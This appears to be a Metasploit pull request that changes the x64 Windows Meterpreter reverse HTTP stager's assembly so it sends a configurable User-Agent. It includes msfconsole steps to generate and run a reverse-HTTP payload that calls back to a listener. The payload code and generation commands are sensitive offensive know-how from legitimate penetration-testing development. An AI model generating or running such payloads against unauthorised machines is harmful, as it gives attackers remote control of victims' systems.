### PR TITLE
Ensure Windows x64 Meterpreter HTTP/S Payloads Include the User Agent Header

### DIFF
--- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
@@ -62,7 +62,7 @@ module Payload::Windows::ReverseHttp_x64
       # Otherwise default to small URIs
       conf[:url]        = luri + generate_small_uri
     end
-
+  
     generate_reverse_http(conf)
   end
 
@@ -168,6 +168,7 @@ module Payload::Windows::ReverseHttp_x64
   # @option opts [String] :url The URI to request during staging
   # @option opts [String] :host The host to connect to
   # @option opts [Integer] :port The port to connect to
+  # @option opts [String] :ua The User Agent the payload will use
   # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
   # @option opts [String] :proxy_host The optional proxy server host to use
   # @option opts [Integer] :proxy_port The optional proxy server port to use
@@ -245,8 +246,20 @@ module Payload::Windows::ReverseHttp_x64
       internetopen:
         push rbx                      ; stack alignment
         push rbx                      ; NULL pointer
-        mov rcx, rsp                  ; lpszAgent ("")
     ^
+
+    if opts[:ua]
+      asm << %Q^
+        call load_useragent
+        db"#{opts[:ua]}", 0x00
+      load_useragent:
+        pop rcx                         ; lpszAgent (stack pointer)
+      ^
+    else
+      asm << %Q^
+        mov rcx, rsp                    ; lpszAgent("")
+      ^
+    end
 
     if proxy_enabled
       asm << %Q^


### PR DESCRIPTION
This code addresses an issue in the Windows x64 meterpreter staged reverse http, and by extension https, payload. These payloads do not make use of the HttpUserAgent option when it makes it's request to a listener e.g msf's exploit multi/handler. I have put a simple check in the inline assembly to include the User Agent if it is set. There is a default user agent for the payload so the default behavior of this payload will be to make requests with a user agent of `Mozilla/5.0 (Windows NT 10 .0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0` if no User Agent is desired simply `set HttpUserAgent ""` and the payload will not include a User Agent.

I encountered this issue organically but it seems to have been identified in #15886

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use payload/windows/x64/meterpreter/reverse_http`
- [ ] `set LHOST 127.0.0.1`
- [ ] `set LPORT 8080`
- [ ] `set HttpUserAgent verified123`
- [ ] `generate -f exe -o payload.exe`
- [ ] if applicable, copy payload to a windows target
- [ ] launch Burp suite and ensure the proxy is listening on 127.0.0.1:8080 and is configured to forward to 127.0.0.1:8081 (don't actually need anything listening)
- [ ] ensure Burp is intercepting requests
- [ ] execute the payload
- [ ] observe a GET request with the the user agent header set properly 'User Agent: verified123'

below are some screenshots of my testing,

current behavior:
![msf1](https://github.com/user-attachments/assets/23c72d80-f641-490c-97fa-a0176d057983)
![msf4](https://github.com/user-attachments/assets/4a15313d-cd46-443d-b33e-bb1ad83c1821)

fixed behavior:
![msf6](https://github.com/user-attachments/assets/78dd078a-4649-4de3-8817-a592f4dda537)
